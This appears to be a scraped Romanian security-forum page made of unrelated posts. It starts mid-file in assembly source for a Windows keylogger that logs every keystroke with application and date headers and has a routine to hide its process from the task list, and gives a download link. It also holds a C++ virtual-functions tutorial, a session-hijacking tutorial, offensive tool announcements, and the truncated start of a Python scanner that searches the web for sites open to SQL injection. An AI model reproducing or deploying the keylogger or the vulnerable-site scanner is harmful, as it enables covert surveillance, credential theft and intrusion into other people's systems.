puntero del archivo final para evitar sobreescribir los ;datos que pueda tener INVOKE SetFilePointer, h_keylogfile, NULL, NULL, FILE_END ;Code for the second line separator .IF first_app_hooked == TRUE AND first_app_hooked, 0 .ELSE ;We write the Enter key chars (0Dh - 0Ah) ;Se escribe el Enter mas el retorno de carro MOV EBX, OFFSET keylogfilebuff MOV WORD PTR [EBX], 0A0Dh INVOKE WriteFile, h_keylogfile, ADDR keylogfilebuff, 2, ADDR bytes_written, NULL ;A dash line separator is written ;Se escribe la linea separadora de guiones INVOKE WriteFile, h_keylogfile, ADDR line_2, 50, ADDR bytes_written, NULL INVOKE WriteFile, h_keylogfile, ADDR line_2, 50, ADDR bytes_written, NULL .ENDIF ;We write the Enter key chars (0Dh - 0Ah) ;Se escribe el Enter mas el retorno de carro MOV EBX, OFFSET keylogfilebuff MOV WORD PTR [EBX], 0A0Dh INVOKE WriteFile, h_keylogfile, ADDR keylogfilebuff, 2, ADDR bytes_written, NULL ;The info header field 1 is written INVOKE WriteFile, h_keylogfile, ADDR infoheader_f1, 13, ADDR bytes_written, NULL ;The application path and name is written: INVOKE WriteFile, h_keylogfile, addr_app_name, appnamelen, ADDR bytes_written, NULL ;We write the Enter key chars (0Dh - 0Ah) ;Se escribe el Enter mas el retorno de carro MOV EBX, OFFSET keylogfilebuff MOV WORD PTR [EBX], 0A0Dh INVOKE WriteFile, h_keylogfile, ADDR keylogfilebuff, 2, ADDR bytes_written, NULL ;The info header field 1 is written INVOKE WriteFile, h_keylogfile, ADDR infoheader_f2, 14, ADDR bytes_written, NULL INVOKE GetDateStamp, ADDR keylogfilebuff MOV temp, EAX INVOKE WriteFile, h_keylogfile, ADDR keylogfilebuff, temp, ADDR bytes_written, NULL ;We write the Enter key chars (0Dh - 0Ah) ;Se escribe el Enter mas el retorno de carro MOV EBX, OFFSET keylogfilebuff MOV WORD PTR [EBX], 0A0Dh INVOKE WriteFile, h_keylogfile, ADDR keylogfilebuff, 2, ADDR bytes_written, NULL ;The info header field 1 is written INVOKE WriteFile, h_keylogfile, ADDR infoheader_f3, 11, ADDR bytes_written, NULL ;We write the Enter key chars (0Dh - 0Ah) ;Se escribe el Enter mas el retorno de carro MOV EBX, OFFSET keylogfilebuff MOV DWORD PTR [EBX], 0A0D0A0Dh INVOKE WriteFile, h_keylogfile, ADDR keylogfilebuff, 4, ADDR bytes_written, NULL RET WriteAppInfoHeader ENDP ;******************************************************************************************************************* ;This procedure writes into the file the keys pressed by the user ;******************************************************************************************************************* WriteKeyPressed PROC virtualkeycode:DWORD LOCAL bytes_written:DWORD, len_string:DWORD INVOKE TranslateVirtualKeyCode, virtualkeycode, ADDR keylogfilebuff MOV len_string, EAX ;The file pointer is set to the end of the file in order to avoid ;overwriting any other data ;Se posiciona el puntero del archivo final para evitar sobreescribir los ;datos que pueda tener INVOKE SetFilePointer, h_keylogfile, NULL, NULL, FILE_END ;The character typed by the user is written INVOKE WriteFile, h_keylogfile, ADDR keylogfilebuff, len_string, ADDR bytes_written, NULL RET WriteKeyPressed ENDP ;******************************************************************************************************************* ;This function translates the virtual code of a key being pressed into its name. The result is ;saved into a buffer whose address is received as a parameter. Returns the length of the name of ;the key's name. ;Esta funcion se encarga de traducir el codigo virtual de una tecla presionada. El resultado ;lo deposita en el buffer cuya direccion recibe en el segundo parametro. Devuelve el largo ;de la cadena traducida resultante. ;******************************************************************************************************************* TranslateVirtualKeyCode PROC virtualkeycode:DWORD, addr_buffer:DWORD LOCAL len_string:DWORD ;Local variables are reset AND len_string, 0 MOV EAX, virtualkeycode ;If the virtual code of the key is between "A" (41h) and "Z" (54h) ;Si el codigo virtual de la tecla esta entre "A" (41h) y "Z" (54h) .IF EAX >= 41h && EAX <= 5Ch ;We check whether the Caps Lock key is activated ;Se determinara si la tecla "Bloq Mayus" esta activada INVOKE GetKeyState, VK_CAPITAL .IF EAX == NULL ADD virtualkeycode, 20h .ENDIF MOV EAX, virtualkeycode MOV EBX, addr_buffer MOV BYTE PTR [EBX], AL ;The string of the key's name is 1 byte in length ;El largo de la cadena es de un byte MOV len_string, 1 .ELSEIF EAX == VK_ESCAPE INVOKE lstrcpy, addr_buffer, ADDR k_escape MOV len_string, 5 .ELSEIF EAX == VK_TAB INVOKE lstrcpy, addr_buffer, ADDR k_tab MOV len_string, 5 .ELSEIF EAX == VK_F1 INVOKE lstrcpy, addr_buffer, ADDR k_f1 MOV len_string, 4 .ELSEIF EAX == VK_F2 INVOKE lstrcpy, addr_buffer, ADDR k_f2 MOV len_string, 4 .ELSEIF EAX == VK_F3 INVOKE lstrcpy, addr_buffer, ADDR k_f3 MOV len_string, 4 .ELSEIF EAX == VK_F4 INVOKE lstrcpy, addr_buffer, ADDR k_f4 MOV len_string, 4 .ELSEIF EAX == VK_F5 INVOKE lstrcpy, addr_buffer, ADDR k_f5 MOV len_string, 4 .ELSEIF EAX == VK_F6 INVOKE lstrcpy, addr_buffer, ADDR k_f6 MOV len_string, 4 .ELSEIF EAX == VK_F7 INVOKE lstrcpy, addr_buffer, ADDR k_f7 MOV len_string, 4 .ELSEIF EAX == VK_F8 INVOKE lstrcpy, addr_buffer, ADDR k_f8 MOV len_string, 4 .ELSEIF EAX == VK_F9 INVOKE lstrcpy, addr_buffer, ADDR k_f9 MOV len_string, 4 .ELSEIF EAX == VK_F10 INVOKE lstrcpy, addr_buffer, ADDR k_f10 MOV len_string, 5 .ELSEIF EAX == VK_F11 INVOKE lstrcpy, addr_buffer, ADDR k_f11 MOV len_string, 5 .ELSEIF EAX == VK_F12 INVOKE lstrcpy, addr_buffer, ADDR k_f12 MOV len_string, 5 .ELSEIF EAX == VK_SNAPSHOT INVOKE lstrcpy, addr_buffer, ADDR k_printscreen MOV len_string, 13 .ELSEIF EAX == VK_SCROLL INVOKE lstrcpy, addr_buffer, ADDR k_scrolllock MOV len_string, 12 ;(13h) ;(10h) Virtual-key code for the Break key .ELSEIF EAX == 13h INVOKE lstrcpy, addr_buffer, ADDR k_break MOV len_string, 7 .ELSEIF EAX == VK_INSERT INVOKE lstrcpy, addr_buffer, ADDR k_insert MOV len_string, 8 .ELSEIF EAX == VK_HOME INVOKE lstrcpy, addr_buffer, ADDR k_home MOV len_string, 6 .ELSEIF EAX == VK_PGUP INVOKE lstrcpy, addr_buffer, ADDR k_pageup MOV len_string, 8 .ELSEIF EAX == VK_DELETE INVOKE lstrcpy, addr_buffer, ADDR k_delete MOV len_string, 8 .ELSEIF EAX == VK_END INVOKE lstrcpy, addr_buffer, ADDR k_end MOV len_string, 5 .ELSEIF EAX == VK_PGDN INVOKE lstrcpy, addr_buffer, ADDR k_pagedown MOV len_string, 10 .ELSEIF EAX == VK_SPACE MOV EBX, addr_buffer MOV BYTE PTR [EBX], 20h ;The string of the key's name is 1 byte in length ;El largo de la cadena es de un byte MOV len_string, 1 .ELSEIF EAX == VK_BACK INVOKE lstrcpy, addr_buffer, ADDR k_back MOV len_string, 6 .ELSEIF EAX == VK_CAPITAL INVOKE lstrcpy, addr_buffer, ADDR k_capslock MOV len_string, 10 .ELSEIF EAX == VK_NUMLOCK INVOKE lstrcpy, addr_buffer, ADDR k_numlock MOV len_string, 9 ;(10h) Virtual-key code for the Shit key .ELSEIF EAX == 10h INVOKE lstrcpy, addr_buffer, ADDR k_shift MOV len_string, 7 ;(11h) Virtual-key code for the Control key .ELSEIF EAX == 11h INVOKE lstrcpy, addr_buffer, ADDR k_control MOV len_string, 9 ;(12h) Virtual-key code for the Alt key .ELSEIF EAX == 12h INVOKE lstrcpy, addr_buffer, ADDR k_alt MOV len_string, 5 ;(0Dh) Virtual-key code for the Enter key .ELSEIF EAX == VK_RETURN MOV AX, 0A0Dh MOV EBX, addr_buffer MOV WORD PTR [EBX], AX MOV len_string, 2 ;Numbers .ELSEIF EAX >= 30h && EAX <= 39h MOV EAX, virtualkeycode MOV EBX, addr_buffer MOV BYTE PTR [EBX], AL ;The string of the key's name is 1 byte in length ;El largo de la cadena es de un byte MOV len_string, 1 .ELSEIF EAX == VK_LEFT INVOKE lstrcpy, addr_buffer, ADDR k_left MOV len_string, 6 .ELSEIF EAX == VK_UP INVOKE lstrcpy, addr_buffer, ADDR k_up MOV len_string, 4 .ELSEIF EAX == VK_RIGHT INVOKE lstrcpy, addr_buffer, ADDR k_right MOV len_string, 7 .ELSEIF EAX == VK_DOWN INVOKE lstrcpy, addr_buffer, ADDR k_down MOV len_string, 6 .ELSEIF EAX == VK_NUMPAD0 INVOKE lstrcpy, addr_buffer, ADDR k_numpad0 MOV len_string, 10 .ELSEIF EAX == VK_NUMPAD1 INVOKE lstrcpy, addr_buffer, ADDR k_numpad1 MOV len_string, 10 .ELSEIF EAX == VK_NUMPAD2 INVOKE lstrcpy, addr_buffer, ADDR k_numpad2 MOV len_string, 10 .ELSEIF EAX == VK_NUMPAD3 INVOKE lstrcpy, addr_buffer, ADDR k_numpad3 MOV len_string, 10 .ELSEIF EAX == VK_NUMPAD4 INVOKE lstrcpy, addr_buffer, ADDR k_numpad4 MOV len_string, 10 .ELSEIF EAX == VK_NUMPAD5 INVOKE lstrcpy, addr_buffer, ADDR k_numpad5 MOV len_string, 10 .ELSEIF EAX == VK_NUMPAD6 INVOKE lstrcpy, addr_buffer, ADDR k_numpad6 MOV len_string, 10 .ELSEIF EAX == VK_NUMPAD7 INVOKE lstrcpy, addr_buffer, ADDR k_numpad7 MOV len_string, 10 .ELSEIF EAX == VK_NUMPAD8 INVOKE lstrcpy, addr_buffer, ADDR k_numpad8 MOV len_string, 10 .ELSEIF EAX == VK_NUMPAD9 INVOKE lstrcpy, addr_buffer, ADDR k_numpad9 MOV len_string, 10 .ELSEIF EAX == VK_DIVIDE || EAX == 0BFh MOV AL, '/' MOV EBX, addr_buffer MOV BYTE PTR [EBX], AL MOV len_string, 1 .ELSEIF EAX == VK_MULTIPLY MOV AL, '*' MOV EBX, addr_buffer MOV BYTE PTR [EBX], AL MOV len_string, 1 .ELSEIF EAX == VK_SUBTRACT || EAX == 0BDh MOV AL, '-' MOV EBX, addr_buffer MOV BYTE PTR [EBX], AL MOV len_string, 1 .ELSEIF EAX == VK_ADD MOV AL, '+' MOV EBX, addr_buffer MOV BYTE PTR [EBX], AL MOV len_string, 1 .ELSEIF EAX == VK_DECIMAL || EAX == 0BEh MOV AL, '.' MOV EBX, addr_buffer MOV BYTE PTR [EBX], AL MOV len_string, 1 .ELSEIF EAX == 0C0h MOV AL, '`' MOV EBX, addr_buffer MOV BYTE PTR [EBX], AL MOV len_string, 1 .ELSEIF EAX == 0BAh MOV AL, ';' MOV EBX, addr_buffer MOV BYTE PTR [EBX], AL MOV len_string, 1 .ELSEIF EAX == 0BBh MOV AL, '=' MOV EBX, addr_buffer MOV BYTE PTR [EBX], AL MOV len_string, 1 .ELSEIF EAX == 0BCh MOV AL, ',' MOV EBX, addr_buffer MOV BYTE PTR [EBX], AL MOV len_string, 1 .ELSEIF EAX == 0DBh MOV AL, '[' MOV EBX, addr_buffer MOV BYTE PTR [EBX], AL MOV len_string, 1 .ELSEIF EAX == 0DCh || EAX == 0E2h MOV AL, '\' MOV EBX, addr_buffer MOV BYTE PTR [EBX], AL MOV len_string, 1 .ELSEIF EAX == 0DDh MOV AL, ']' MOV EBX, addr_buffer MOV BYTE PTR [EBX], AL MOV len_string, 1 .ELSEIF EAX == 0DEh MOV AL, 27h MOV EBX, addr_buffer MOV BYTE PTR [EBX], AL MOV len_string, 1 .ELSE INVOKE lstrcpy, addr_buffer, ADDR k_unknown MOV len_string, 9 .ENDIF MOV EAX, len_string RET TranslateVirtualKeyCode ENDP ;******************************************************************************************************************* ;******************************************************************************************************************* dlgabout PROC hDlg:HWND, uMsg:UINT, wParam:WPARAM, lParam:LPARAM .IF uMsg==WM_INITDIALOG INVOKE MessageBeep, NULL INVOKE GetDlgItem, hDlg, IDC_BUTTON3 INVOKE SetFocus, EAX .ELSEIF uMsg == WM_CLOSE INVOKE EndDialog, hDlg, NULL .ELSEIF uMsg == WM_COMMAND MOV EAX, wParam .IF AX == IDC_BUTTON3 INVOKE SendMessage, hDlg, WM_CLOSE, NULL, NULL .ENDIF .ELSE MOV EAX, FALSE RET .ENDIF MOV EAX, TRUE RET dlgabout ENDP ;******************************************************************************************************************* ;This function will try to hide this program from the task list. If successful, return 0; else ;returns -1 (0FFFFFFFFh). ;******************************************************************************************************************* HideProcess PROC LOCAL h_kernel:DWORD, addr_function:DWORD, return_val:DWORD INVOKE GetModuleHandle, ADDR kernel_name MOV h_kernel, EAX INVOKE GetProcAddress, h_kernel, ADDR kernel_function MOV addr_function, EAX .IF EAX == NULL MOV return_val, -1 .ELSE PUSH 1 PUSH 0 CALL EAX AND return_val, 0 .ENDIF MOV EAX, return_val RET HideProcess ENDP ;******************************************************************************************************************* END start Download (complet): http://win32assembly.online.fr/files/KeyLogV1-1.zip

[C++] Functii virtuale Ca tot aveam ceva legat de acest subiect la POO (programare orientata pe obiecte) la facultate, am decis sa fac un mic "tutorial". Cred ca se poate intelege bine asa, prin exemplu direct. Colorat frumos: http://pastebin.com/NFWwf9Qv Despre ce e vorba: /* Tema: Cateva lucruri despre constructori, destructori, functii virtuale, (up/down)casting in C++ Autor: Ionut Gabriel Popescu Data: 06 Aprilie 2011 */ #include <iostream> using namespace std; // O clasa de baza class Vehicul { public: // Constructor si destructor Vehicul() { cout<<"Constructor Vehicul"<<endl; } ~Vehicul() { cout<<"Destructor Vehicul"<<endl; } // Copiere, atribuire Vehicul(Vehicul &ob) { cout<<"Constructor de copiere Vehicul"<<endl; } Vehicul& operator = (Vehicul &ob) { cout<<"Operator = Vehicul"<<endl; return *this; } // Functii pentru teste virtual void virtuala() { cout<<"Functia virtuala() Vehicul"<<endl; } void nevirtuala() { cout<<"Functia nevirtuala() Vehicul"<<endl; } }; // O clasa derivata class Masina: public Vehicul { public: // Constructor si destructor Masina() { cout<<"Constructor Masina"<<endl; } ~Masina() { cout<<"Destructor Masina"<<endl; } // Copiere si atribuire Masina(Masina &ob) { cout<<"Constructor de copiere Masina"<<endl; } Masina& operator = (Masina &ob) { cout<<"Operator = Masina"<<endl; return *this; } // Pentru teste void virtuala() { cout<<"Functia virtuala() Masina"<<endl; } void nevirtuala() { cout<<"Functia nevirtuala() Masina"<<endl; } // Downcasting: cand atribuim unui obiect de clasa derivata, un obiect al clasei de baza Masina(Vehicul &ob) { cout<<"Constructor de copiere Masina"<<endl; } Masina& operator = (Vehicul &ob) { cout<<"Operator = Masina"<<endl; return *this; } }; int main() { // Cream un obiect de tipul Vehicul si un pointer la acest tip cout<<"-- Se creaza obiectul o_vehicul --"<<endl; Vehicul o_vehicul, *p_vehicul; cout<<"-- A fost creat obiectul o_vehicul --"<<endl<<endl; // Cream apoi obiectul de tipul Masina. Se va apela mai intai constructorul clasei de baza, Vehicul, apoi constructorul clasei Masina (derivat) cout<<"-- Se creaza obiectul o_masina --"<<endl; Masina o_masina, *p_masina; cout<<"-- A fost creat obiectul o_masina --"<<endl<<endl; // Cazurile in care unui pointer la Vehicul ii atribuim adresa unui Vehicul, la fel si cu Masina nu are rost sa le iau in considerare // Nu avem Late Binding, apelul se cunoaste de la compilare, se apeleaza normal metodele // Testam polimorfismul de executie. // Atribuim unui pointer la clasa de baza, adresa unui obiect derivat (sau un pointer la un obiect derivat) // Compilatorul stie sa faca conversia (implicita) de la "derivat" la "de baza" p_vehicul = &o_masina; // Apelam functiile pentru teste sa vedem ce se intampla cout<<"-- Apelam metodele pentru teste (Cazul I) --"<<endl; p_vehicul -> virtuala(); p_vehicul -> nevirtuala(); cout<<"-- Am apelat metodele pentru teste --"<<endl; // Dupa cum se vede, se apeleaza functia virtuala din Masina, ceea ce trebuie, deoarece am atribuit adresa unui obiect Masina pointerului // Iar functia nevirtuala, este apelata din clasa de baza // p_masina = p_vehicul; va genera o eroare la compilare, nu se poate face conversia // p_vehicul = p_masina; se va executa fara nici o problema, conversii explicite cout<<endl; // Daca atribuim unui obiect de baza, un obiect derivat // Se va apela operatoru = din clasa de baza, deoarece se face conversia implicita de la Masina (derivat) la Vehicul (de baza) cout<<"-- Atribuire: de_baza = derivat --"<<endl; o_vehicul = o_masina; cout<<"-- Am facut atribuirea --"<<endl; // Deci se va apela operator = din clasa de baza, Vehicul cout<<endl; // Dar ce se intampla daca vrem sa atribuim unui obiect derivat un obiect al clasei de baza? (downcasting) // Pentru asta nu exista conversii implicite, dar le putem defini noi // Si am facut asta prin definirea constructorului de copiere al clasei derivate, si al supraincarcarii lui = cu parametru de tip obiect al clasei de baza cout<<"-- Atribuire: derivat = de_baza --"<<endl; o_masina = o_vehicul; cout<<"-- Am facut atribuirea --"<<endl; // Deci se apeleaza operatorul = din Masina (derivata) cu parametru obiect de tipul clasei de baza cout<<endl; // Downcasting cu pointeri? // Facem conversia explicita de la vehicul (de baza) la Masina (derivat) p_masina = (Masina *)&o_vehicul; // Si apelam metodele noastre sa vedem ce se intampla cout<<"-- Apelam metodele pentru teste (Cazul II) --"<<endl; p_masina -> virtuala(); p_masina -> nevirtuala(); cout<<"-- Am apelat metodele pentru teste --"<<endl; // Dupa cum se vede, se apeleaza metoda virtuala din Vehicul (de baza) si metoda nevirtuala din Masina (derivat) // Dupa cum trebuia sa stiti: daca un obiect are una sau mai multe metode virtuala, se creaza o tabela (vTable) care contine pointeri la metodele virtuale ale obiectului // Si pentru clasa cu metode virtuale se creaza un pointer la acea tabela, ascuns programatorului, care informativ ocupa inca 4 octeti (pe sisteme de 32 de biti) pentru clasa // Iar apelul metodelor virtuale se face prin intermediu acelui pointer. Pentru fiecare clasa ce contine 1+ metode virtuale se creaza o astfel de tabela // Se creaza o astfel de tabela pentru clasa, nu pentru fiecare obiect in parte, deci putem avea 2000 de obiecte, vom avea o singura tabela // Pentru clasa derivata, in acea tabela, metodele care le suprascriu (suprascriere != supraincarcare) pe cele virtuale, le inlocuiesc pe cele din clasa de baza // Iar la apelul unei metode virtuale, este apelata metoda din acea tabela, care daca a fost suprascrisa, va fi apelata cea din clasa derivata // Cazul I // Sa luam primul caz: upcasting, cel clasic, cand atribuim unui pointer la o clasa de baza adresa unui obiect derivat (sau un pointer catre un obiect derivat) // La p_vehicul = &o_masina; , pointerul p_vehicul va indica catre adresa obiectului o_masina, chiar daca este de tip Masina (derivat) // Astfel, el va indica si catre pointerul catre vTable din clasa Masina, deci un apela catre virtuala() va apela metoda din clasa Masina (cea derivata), ceea ce ne trebuie // Iar un apel catre nevirtuala(), dat fiind faptul ca e vorba de un pointer la Vechicul, va apela metoda nevirtuala() din clasa Vechicul // Cazul II // Luam acum cazul de downcasting, cand avem un pointer la un obiect derivat (p_masina) si ii atribuim, prin conversie explicita (Masina*) adresa unui obiect de baza (Vehicul) // Astfel, p_masina este un pointer de tipul Masina si indica catre un obiect de tipul Vehicul // Cum e de tipul Masina, apelul metodei nevirtuala() va apela metoda din clasa Masina // Si cum acest pointer indica un obiect de tipul Vehicul, pointerul catre vTable va indica catre tabela de metode a clasei Vehicul // Deci apelul catre metoda virtuala() va apela metoda virtuala() din clasa Vehicul cout<<endl<<"-- Se iese din program --"<<endl; // Sper ca ati inteles si sper ca nu am spus prostii return 0; } Astept o parere de la cineva interesat de C++ OOP. Am incercat sa acopar cat mai multe, insa ce am acoperit e ceea ce m-a interesat pe mine, si sunt niste concepte care provoaca extrem de multe probleme in C++. Sper sa fie de folos cuiva.

E o colectie de programe, e posibil ca acele programe sa fie detectate ca "HackTool" sau ceva asemanator, deci sa nu faca rau, dar e foarte posibil si ca acele tool-uri sa fie infectate. Desigur, se poate si ca aceasta aplicatie sa fie infectata. Dar exista masini virtuale.

Bun, nu sunt foarte multi pasionati de Java pe aici, bine ai venit.

Mi se pare normal... Nu mai veniti cu astfel de comentarii. Nu il puteti deschide, treceti mai departe.

Advanced MySQL Exploitation by Muhaimin Dzulfakar Contents 1 Abstract...........................................................................................................................................3 2 Introduction ...................................................................................................................................3 3 Stacked Query................................................................................................................................3 4 Attacking MySQL on applications that do support stacked queries...............................................4 5 Attacking MySQL on applications that do not support stacked queries........................................5 6 Fingerprinting the web server directory.........................................................................................7 6.1 Fingerprint through error message method................................................................................7 6.2 Fingerprint through LOAD_FILE method......................................................................................7 7 Maximum size of arbitrary code allowed........................................................................................7 8 Arbitrary file compression/decompression ....................................................................................8 9 Dealing with columns......................................................................................................................8 10 Remote code execution on LAMP.................................................................................................9 11 Remote code execution on WAMP.............................................................................................10 References .......................................................................................................................................11 Download: http://dl.packetstormsecurity.net/papers/database/mysql-exploitation.pdf

Session Hijacking Basics __ _ _ _ _ _ / _\ ___ ___ ___(_) ___ _ __ /\ /(_)(_) __ _ ___| | _(_)_ __ __ _ \ \ / _ \/ __/ __| |/ _ \| '_ \ / /_/ / || |/ _` |/ __| |/ / | '_ \ / _` | _\ \ __/\__ \__ \ | (_) | | | | / __ /| || | (_| | (__| <| | | | | (_| | \__/\___||___/___/_|\___/|_| |_| \/ /_/ |_|/ |\__,_|\___|_|\_\_|_| |_|\__, | |__/ |___/ Basic # language: English # Title: Session Hijacking Basic # Date: 2011-01-13 # Author: Filipe Barros/@barros_filipe | +01 - Session Fixation | +02 - Session Hijacking | +03 - Firesheep Have fun ====== +01 - Session Fixation ====== The attacker attempts to gain access to another user's session by posing as that user. The information for an attacker is the session identifier, because this is required for any impersonation attack. There are three common methods used to obtain a valid session identifier: * Fixation * Capture * Prediction Prediction refers to guessing a valid session identifier. With PHP's native session mechanism, the session identifier is extremely random, and this is unlikely to be the weakest point in your implementation. Because session identifiers are typically propagated in cookies or as GET variables, the different approaches focus on attacking these methods of transfer. While there have been a few browser vulnerabilities regarding cookies, these have mostly been Internet Explorer, and cookies are slightly less exposed than GET variables. for those users who enable cookies, you can provide them with a more secure mechanism by using a cookie to propagate the session. Fixation is the simplest method of obtaining a valid session identifier. While it's not very difficult to defend against, if your session mechanism consists of nothing more than session_start(), you are vulnerable. To demonstrate session fixation, I'll use the following script, session-hijacking.php: [ Begin PHP CODE ] <?php session_start(); if (!isset($_SESSION['visits'])) { $_SESSION['visits'] = 1; } else { $_SESSION['visits']++; } echo $_SESSION['visits']; ?> [ End PHP CODE ] First make sure that you do not have an existing session identifier (perhaps delete your cookies), then visit this page with ?PHPSESSID=123456789 appended to the URL. Next, with a completely different browser (or even a completely different computer), visit the same URL again with ?PHPSESSID=123456789 appended. You will notice that you do not see 1 output on your first visit, but rather it continues the session you previously initiated. If there isn't an active session associated with a session identifier that the user is presenting, then regenerate it just to be sure: [ Begin PHP CODE ] <?php session_start(); if (!isset($_SESSION['initiated'])) { session_regenerate_id(); $_SESSION['initiated'] = true; } ?> [ End PHP CODE ] The problem with such a simplistic defense is that an attacker can simply initialize a session for a particular session identifier and then use that identifier to launch the attack. ====== +02 - Session Hijacking ====== If your session mechanism have only session_start(), you are vulnerable. With the most simplistic session mechanism, a valid session identifier is all that is needed to successfully hijack a session. In order to improve this, we need to see if there is anything extra in an HTTP request that we can use for extra identification. Recall a typical HTTP request: GET / HTTP/1.1 Host: example.com User-Agent: Mozilla/5.0 Gecko Accept: text/xml, image/png, image/jpeg, image/gif, */* Cookie: PHPSESSID=123456789 Only the Host header is required by HTTP/1.1, so it seems unwise to rely on anything else. However, consistency is really all we need, because we're only interested in complicating impersonation without adversely affecting legitimate users. Imagine that the previous request is followed by a request with a different User-Agent: GET / HTTP/1.1 Host: example.com User-Agent: Mozilla Compatible (MSIE) Accept: text/xml, image/png, image/jpeg, image/gif, */* Cookie: PHPSESSID=123456789 Although the same cookie is presented, should it be assumed that this is the same user? It seems highly unlikely that a browser would change the User-Agent header between requests, right? Let's modify the session mechanism to perform an extra check: [ Begin PHP CODE ] <?php session_start(); if (isset($_SESSION['HTTP_USER_AGENT'])) { if ($_SESSION['HTTP_USER_AGENT'] != md5($_SERVER['HTTP_USER_AGENT'])) { /* Prompt for password */ exit; } } else { $_SESSION['HTTP_USER_AGENT'] = md5($_SERVER['HTTP_USER_AGENT']); } ?> [ End PHP CODE ] Now an attacker must not only present a valid session identifier, but also the correct User-Agent header that is associated with the session. This complicates things slightly, and it is therefore a bit more secure. Imagine if we required the user to pass the MD5 of the User-Agent in each request. An attacker could no longer just recreate the headers that the victim's requests contain, but it would also be necessary to pass this extra bit of information. While guessing the construction of this particular token isn't too difficult, we can complicate such guesswork by simply adding an extra bit of randomness to the way we construct the token: <?php $string = $_SERVER['HTTP_USER_AGENT']; $string .= 'SHIFLETT'; /* Add any other data that is consistent */ $fingerprint = md5($string); ?> Keeping in mind that we're passing the session identifier in a cookie, and this already requires that an attack be used to compromise this cookie (and likely all HTTP headers as well), we should pass this fingerprint as a URL variable. This must be in all URLs as if it were the session identifier, because both should be required in order for a session to be automatically continued (in addition to all checks passing). In order to make sure that legitimate users aren't treated like criminals, simply prompt for a password if a check fails. If there is an error in your mechanism that incorrectly suspects a user of an impersonation attack, prompting for a password before continuing is the least offensive way to handle the situation. In fact, your users may appreciate the extra bit of protection perceived from such a query. There are many different methods you can use to complicate impersonation and protect your applications from session hijacking. Hopefully you will at least do something in addition to session_start() as well as be able to come up with a few ideas of your own. ====== +03 - Firesheep ====== Recently a firefox extension called Firesheep has exploited and made it easy for public wifi users to be attacked by session hijackers. Websites like Facebook, Twitter, and any that the user adds to their preferences allow the firesheep user to easily access private information from cookies and threaten the public wifi users personal property. Firesheep is free, open source, and is available now for Mac OS X and Windows. Linux support is on the way. Websites have a responsibility to protect the people who depend on their services. They've been ignoring this responsibility for too long, and it's time for everyone to demand a more secure web. My hope is that Firesheep will help the users win. Thanks! Sursa: http://packetstormsecurity.org/files/view/97548/session-hijackbasic.txt

yInjector MySQL Injection Tool yInjector is a MySQL injection penetration tool. It has multiple features, proxy support, and multiple exploitation methods. Download: http://dl.packetstormsecurity.net/UNIX/scanners/yInjector.tar.gz Detalii: http://y-osirys.com/softwares/#subsec=m-softwares,id=10,title=yInjector%20-%20SQL%20Inj%20Penetration%20Tool

Mptcp Packet Manipulator 1.7 Mpctp is a tool for manipulation of raw packets that allows a large number of options. Its primary purpose is to diagnose and test several scenarios that involving the use of the types of TCP/IP packets. It is able to send certain types of packets to any specific target and manipulations of various fields at runtime. These fields can be modified in its structure as the the Source/Destination IP address and Source/Destination MAC address. Download: http://dl.packetstormsecurity.net/UNIX/scanners/mptcp-1.7-en.tar.gz Detalii: http://www.hexcodes.org/mptcp.i

yCrawler Web Crawling Utility YCrawler is a web crawler that is useful for grabbing all user supplied input related to a given website and will save the output. It has proxy and log file support. Download: http://dl.packetstormsecurity.net/UNIX/scanners/yCrawler.tar.gz Detalii: http://y-osirys.com/

XSSer Penetration Testing Tool 1.5-1 XSSer is an open source penetration testing tool that automates the process of detecting and exploiting XSS injections against different applications. It contains several options to try to bypass certain filters, and various special techniques of code injection. Download: http://dl.packetstormsecurity.net/UNIX/scanners/xsser_1.5-1.tar.gz Detalii: http://sourceforge.net/projects/xsser/

WATOBO Web Application Toolbox Auditor 0.9.6rev266 WATOBO, the Web Application Toolbox, is a tool that enables security professionals to perform highly efficient (semi-automated) web application security audits. It acts like a local proxy and analyzes the traffic on the fly for helpful information and vulnerabilities. It also has automated scanning capabilities, e.g. SQL injection, cross site scripting and more. Changes: Now supports one-time tokens. NTLM authentication added. FileFinder plugin added. Various other additions. Download: http://dl.packetstormsecurity.net/UNIX/scanners/watobo_0.9.6rev266.zip Detalii: http://sourceforge.net/apps/mediawiki/watobo/index.php?title=Main_Page

Scapy Packet Manipulation Tool 2.2.0 Scapy is a powerful interactive packet manipulation tool, packet generator, network scanner, network discovery tool, and packet sniffer. It provides classes to interactively create packets or sets of packets, manipulate them, send them over the wire, sniff other packets from the wire, match answers and replies, and more. Interaction is provided by the Python interpreter, so Python programming structures can be used (such as variables, loops, and functions). Report modules are possible and easy to make. It is intended to do the same things as ttlscan, nmap, hping, queso, p0f, xprobe, arping, arp-sk, arpspoof, firewalk, irpas, tethereal, tcpdump, etc. Changes: This release adds a contrib section filled with old contributions that were not distributed with Scapy yet: CDP, IGMP, MPLS, CHDLC, SLARP, WPA EAPOL, DTP, EIGRP, VQP, BGP, OSPF, VTP RSVP, EtherIP, RIPng, and IKEv2. It fixes some bugs. Download: http://dl.packetstormsecurity.net/UNIX/scanners/scapy-2.2.0.tar.gz Detalii: https://www.secdev.org/projects/scapy/

d0rk3r Local File Inclusion / SQL Injection Scanner d0rk3r is a python script that uses search engines to find sites vulnerable to SQL injection and local file inclusion issues. #!/usr/bin/python # This was written for educational purpose and pentest only. Use it at your own risk. # Author will be not responsible for any damage! # !!! Special greetz for my friend sinner_01 !!! # Toolname : d0rk3r.py # Coder : baltazar a.k.a b4ltazar < b4ltazar@gmail.com> # Version : 0.1 # About : No proxy support in this version, will put it in next one ... # Greetz for rsauron and low1z, great python coders # greetz for d3hydr8, qk, marezzi, StRoNiX, t0r3x and all members of ex darkc0de.com and ljuska.org # # # Example of use : ./d0rk3r.py -i id= -s com -c redfront -f php -m 500 # U have two options, SQLi or LFI scanning . # When found site vuln to sqli, then it try to find number of columns # After scanning check d0rk3r.txt for more info import string, sys, time, urllib2, cookielib, re, random, threading, socket, os, time from random import choice from optparse import OptionParser if sys.platform == 'linux' or sys.platform == 'linux2': clearing = 'clear' else: clearing = 'cls' os.system(clearing) colMax = 20 log = "d0rk3r.txt" logfile = open(log, "a") threads = [] numthreads = 1 lfinumthreads =8 timeout = 4 socket.setdefaulttimeout(timeout) W = "\033[0m"; R = "\033[31m"; G = "\033[32m"; O = "\033[33m"; B = "\033[34m"; rSA = [2,3,4,5,6] CXdic = {'blackle': '013269018370076798483:gg7jrrhpsy4', 'ssearch': '008548304570556886379:0vtwavbfaqe', 'redfront': '017478300291956931546:v0vo-1jh2y4', 'bitcomet': 